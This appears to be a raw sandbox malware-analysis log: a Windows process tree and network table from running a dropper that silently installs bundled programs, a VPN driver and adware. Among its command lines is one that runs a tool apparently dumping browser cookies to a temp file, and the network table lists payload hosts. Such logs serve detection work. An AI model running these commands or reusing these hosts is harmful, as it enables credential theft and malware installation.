"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,335543546694895579,6485397588220622928,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3472 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,335543546694895579,6485397588220622928,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,335543546694895579,6485397588220622928,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3324 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,335543546694895579,6485397588220622928,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3324 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb4afa46f8,0x7ffb4afa4708,0x7ffb4afa4718
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x5uykbnn.ala\GcleanerEU.exe /eufive & exit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,335543546694895579,6485397588220622928,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5568 /prefetch:1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\20itkg2t.ljt\installer.exe /qn CAMPAIGN="654" & exit
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,335543546694895579,6485397588220622928,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6064 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ylscw1iv.fs4\ufgaa.exe & exit
C:\Users\Admin\AppData\Local\Temp\x5uykbnn.ala\GcleanerEU.exe
C:\Users\Admin\AppData\Local\Temp\x5uykbnn.ala\GcleanerEU.exe /eufive
C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{7354aa5a-dfe8-3d4c-87a9-e879acaf3f1e}\oemvista.inf" "9" "4d14a44ff" "000000000000010C" "WinSta0\Default" "0000000000000158" "208" "c:\program files (x86)\maskvpn\driver\win764"
C:\Users\Admin\AppData\Local\Temp\20itkg2t.ljt\installer.exe
C:\Users\Admin\AppData\Local\Temp\20itkg2t.ljt\installer.exe /qn CAMPAIGN="654"
C:\Windows\system32\DrvInst.exe
DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oem2.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "000000000000010C" "f1d4"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 8380 -ip 8380
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\242k4w3k.v2x\anyname.exe & exit
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8380 -s 276
C:\Users\Admin\AppData\Local\Temp\242k4w3k.v2x\anyname.exe
C:\Users\Admin\AppData\Local\Temp\242k4w3k.v2x\anyname.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5qzk3i3y.lne\gcleaner.exe /mixfive & exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding A828F1660D402C964DCF5693FBD0F34E C
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xj1zg1zv.3gu\autosubplayer.exe /S & exit
C:\Users\Admin\AppData\Local\Temp\242k4w3k.v2x\anyname.exe
"C:\Users\Admin\AppData\Local\Temp\242k4w3k.v2x\anyname.exe" -q
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 3976 -ip 3976
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\5qzk3i3y.lne\gcleaner.exe
C:\Users\Admin\AppData\Local\Temp\5qzk3i3y.lne\gcleaner.exe /mixfive
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3976 -s 700
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 6356 -ip 6356
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6356 -s 272
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\20itkg2t.ljt\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\20itkg2t.ljt\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629533761 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,335543546694895579,6485397588220622928,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5312 /prefetch:2
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_E63C.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
MaskVPNUpdate.exe /silent
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1d0,0x210,0x7ffb62c4dec0,0x7ffb62c4ded0,0x7ffb62c4dee0
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff619c19e70,0x7ff619c19e80,0x7ff619c19e90
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1736,14023596039133343380,15699115564314849634,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8640_2014394801" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1752 /prefetch:2
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1736,14023596039133343380,15699115564314849634,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8640_2014394801" --mojo-platform-channel-handle=2084 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1736,14023596039133343380,15699115564314849634,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8640_2014394801" --mojo-platform-channel-handle=1800 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1736,14023596039133343380,15699115564314849634,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8640_2014394801" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2384 /prefetch:1
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1736,14023596039133343380,15699115564314849634,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8640_2014394801" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2188 /prefetch:1
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1736,14023596039133343380,15699115564314849634,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8640_2014394801" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3200 /prefetch:2
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1736,14023596039133343380,15699115564314849634,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8640_2014394801" --mojo-platform-channel-handle=3292 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1736,14023596039133343380,15699115564314849634,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8640_2014394801" --mojo-platform-channel-handle=3544 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1736,14023596039133343380,15699115564314849634,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8640_2014394801" --mojo-platform-channel-handle=3692 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1736,14023596039133343380,15699115564314849634,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8640_2014394801" --mojo-platform-channel-handle=3704 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1736,14023596039133343380,15699115564314849634,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8640_2014394801" --mojo-platform-channel-handle=2564 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb4afa46f8,0x7ffb4afa4708,0x7ffb4afa4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,335543546694895579,6485397588220622928,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4836 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,335543546694895579,6485397588220622928,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3964 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,335543546694895579,6485397588220622928,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6036 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851483
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb4afa46f8,0x7ffb4afa4708,0x7ffb4afa4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,335543546694895579,6485397588220622928,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1940 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,335543546694895579,6485397588220622928,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6412 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851513
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x1e4,0x1e8,0x1ec,0x1a8,0x1f0,0x7ffb4afa46f8,0x7ffb4afa4708,0x7ffb4afa4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,335543546694895579,6485397588220622928,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1808 /prefetch:1
Network
| Country | Destination | Domain | Proto |
| N/A | 20.73.194.208:443 | tcp | |
| N/A | 20.190.160.71:443 | tcp | |
| N/A | 51.124.78.146:443 | settings-win.data.microsoft.com | tcp |
| N/A | 52.152.110.14:443 | slscr.update.microsoft.com | tcp |
| N/A | 52.152.108.96:443 | fe3cr.delivery.mp.microsoft.com | tcp |
| N/A | 52.152.110.14:443 | slscr.update.microsoft.com | tcp |
| N/A | 52.152.110.14:443 | slscr.update.microsoft.com | tcp |
| N/A | 37.0.8.235:80 | tcp | |
| N/A | 52.152.110.14:443 | slscr.update.microsoft.com | tcp |
| N/A | 20.54.110.119:443 | tsfe.trafficshaping.dsp.mp.microsoft.com | tcp |
| N/A | 51.124.78.146:443 | settings-win.data.microsoft.com | tcp |
| N/A | 37.0.11.8:80 | tcp | |
| N/A | 52.247.37.26:80 | tcp | |
| N/A | 172.67.133.215:80 | wfsdragon.ru | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 104.26.4.15:443 | api.db-ip.com | tcp |
| N/A | 104.26.4.15:443 | api.db-ip.com | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
